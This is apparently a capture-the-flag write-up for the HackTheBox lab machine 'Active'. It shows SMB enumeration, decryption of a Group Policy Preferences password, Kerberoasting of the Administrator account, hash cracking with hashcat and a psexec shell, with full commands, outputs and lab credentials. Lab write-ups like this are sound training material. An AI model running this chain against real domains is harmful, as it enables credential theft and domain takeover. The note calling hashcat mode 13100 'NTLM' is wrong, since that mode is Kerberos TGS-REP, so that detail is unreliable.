Active

Port Scanning

nmap -p53,88,135,139,445,464,593,636,3268,5722,9389,47001,49155,49152,49158,49168,49165,49169,49157,49154,49153 -sV -sC -T4 -Pn -oA active.htb active.htb

Scanning Result

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49168/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC

SMB Enum

Smb open port 139/445

smbclient

smbclient -L //active.htb/Replication -U ""%""

Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Replication     Disk      
	SYSVOL          Disk      Logon server share 
	Users           Disk

smclient login

smbclient //10.10.10.100/Replication -U ""%""


smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  Groups.xml                          A      533  Thu Jul 19 04:46:06 2018


smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml

enum4linux

enum4linux active.htb 

 ==================================( Share Enumeration on active.htb )==================================

do_connect: Connection to active.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Replication     Disk      
	SYSVOL          Disk      Logon server share 
	Users           Disk      
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on active.htb

//active.htb/ADMIN$	Mapping: DENIED Listing: N/A Writing: N/A
//active.htb/C$	Mapping: DENIED Listing: N/A Writing: N/A
//active.htb/IPC$	Mapping: OK Listing: DENIED Writing: N/A

[E] Can't understand response:

do_connect: Connection to DC.active.htb failed (Error NT_STATUS_UNSUCCESSFUL)
//active.htb/NETLOGON	Mapping: N/A Listing: N/A Writing: N/A
//active.htb/Replication	Mapping: OK Listing: OK Writing: N/A

[E] Can't understand response:

do_connect: Connection to DC.active.htb failed (Error NT_STATUS_UNSUCCESSFUL)
//active.htb/SYSVOL	Mapping: N/A Listing: N/A Writing: N/A
//active.htb/Users	Mapping: DENIED Listing: N/A Writing: N/A

smbmap

smbmap -H active.htb -R

[+] IP: 10.10.10.100:445	Name: active.htb                                        
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	.\Replication\*
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	active.htb
	.\Replication\active.htb\*
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	DfsrPrivate
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	Policies
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	scripts
	.\Replication\active.htb\DfsrPrivate\*
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	ConflictAndDeleted
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	Deleted
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	Installing
	.\Replication\active.htb\Policies\*
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	{31B2F340-016D-11D2-945F-00C04FB984F9}
	dr--r--r--                0 Sat Jul 21 18:37:44 2018	{6AC1786C-016F-11D2-945F-00C04fB984F9}
	.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*

Foothold

Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

active.htb\SVC_TGS : edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Whenever a new Group Policy Preference (GPP) is created, there’s an xml file created in the SYSVOL share with that config data, including any passwords associated with the GPP. For security, Microsoft AES encrypts the password before it’s stored as cpassword. But then Microsoft published the key on MSDN!

Microsoft issued a patch in 2014 that prevented admins from putting passwords into GPP. But that patch doesn’t do anything about any of these breakable passwords that were already there, and from what I understand, pentesters still find these regularly in 2018. For more details, check out this AD Security post.

Decrypt the hash/key

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ | tee cred

active.htb\SVC_TGS  : GPPstillStandingStrong2k18

Check for account SMB ACCESS connection

smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

NETLOGON                                          	READ ONLY	Logon server share 
Replication                                       	READ ONLY	
SYSVOL                                            	READ ONLY	Logon server share 
Users                                             	READ ONLY

Priv Esc

Check for Kerberoasting

GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out

Obtained hash (GetUserSPNs.out)

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$1ffa88531f4948eca74e8c85e3d7096f$ad3f1fb1ea3a5cb7e7c100b79ff57772260142c39dca461598d754b4c6cf2713e5dee298718093a5aa2ad6dbd1852a3c42afed10d3e6730fb84d76ff5b62f5be3eb1b0d1e9803473fc4e9e0645b8640e6d3d6bc6c852974d2c10770ad79f246a39fed1ae593824833f9d7ef26dcc90bafe5af1f4efc0a77bbbfdfeae5889eac85b1946059f8760f3ce6d902ae256cbb8012607465950c64dd7e4ccd0b5d3e16b84cf537ee5b377c278ced5e8873be6227aa7b32ca4a986db3c7d3ca7d2fa52cc7830f6dc504cef40a137eb93666c5bf4c6a9f4152651e8ef61c3686671a36bc554f79994da9442157b9be265afccc97bc07901c56b346db52ce90870b23a28e2a2e7e6565f1ef4db5b67eab13c684b4ba9c57179f203ef69a7b425533ab071e0230b2fb8d2389f44466d2307c735a8c903707f11884dd14dc51f065f875bf76e009f407e90d99759c4c9612741ce4fa630bead71fa1c87bf53a1815e28b18c0660437b2bbd8b2468ad6b11de0f40343a151daf5aebd07f10b4ec7a8f4f7afa3e8db898b6925d5833025c7cd3a715229c6ceec598e2b9b168a1977ac5c711bd57b9384de0b24140f68a4207650cce4da589c9db32e4455192da0964af242bc05aa3e51350cbc2c004b904909258c6b00f443c330244c8adf47ec6fdb495438346aadede69658c3cb0bb53c4b485d7f81f29670caee26e1cf763fc4b6ae18ff5af89acda09ab122aa846a4f24e5d23400a620a06caf3fc40f414fb32a99a4a7151b92e69ab772dc6233d0edfeafd9e772c642fbf25e486ae170182743a1cfe83c592bbbfe15dc86106becc8a3dee44db0372d9a547de82cebfa745df85123282fd221149a66dbb6847c8b5581722a97af36c4d8b31e954f72cc66745c8ab6d36485845a4a58826a47a1a776e8b88b37f446d6ab597e7fb8fcaac129846510d1b958c84ad493d602a5783e927142233e0d10c9ac4ead27331ca559415bb499efbbb91ba3cb2790028dcd8bc402cbe236b4459ea8757ca5429dcf7ce1d06614e8f4e4b071502cf9a860cade83165bc5c4f49f610be97861a25c2133a9b784288839022afa85e692042d8ff197498cfe466ee460df9e282ac8bb10823822dce7cac0e73cdb4ef7ffaf4432a06da4cb2b4d280c59be071a729090772ffa98957f1db3ef0033e7a7c2b0bb247688fe9a1cdcb8f829e96f4e773665987bfa9929d8b23663efa870cc5c8148e2245728813a2b973b34763383874de869776

Using hashcat to crack it

hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force

  • -m 13100 for NTLM hashes

Cracked

administrator :Ticketmaster1968

Get a shell using psexec

psexec.py active.htb/administrator@10.10.10.100
PreviousActive DirectoryNextForest

Last updated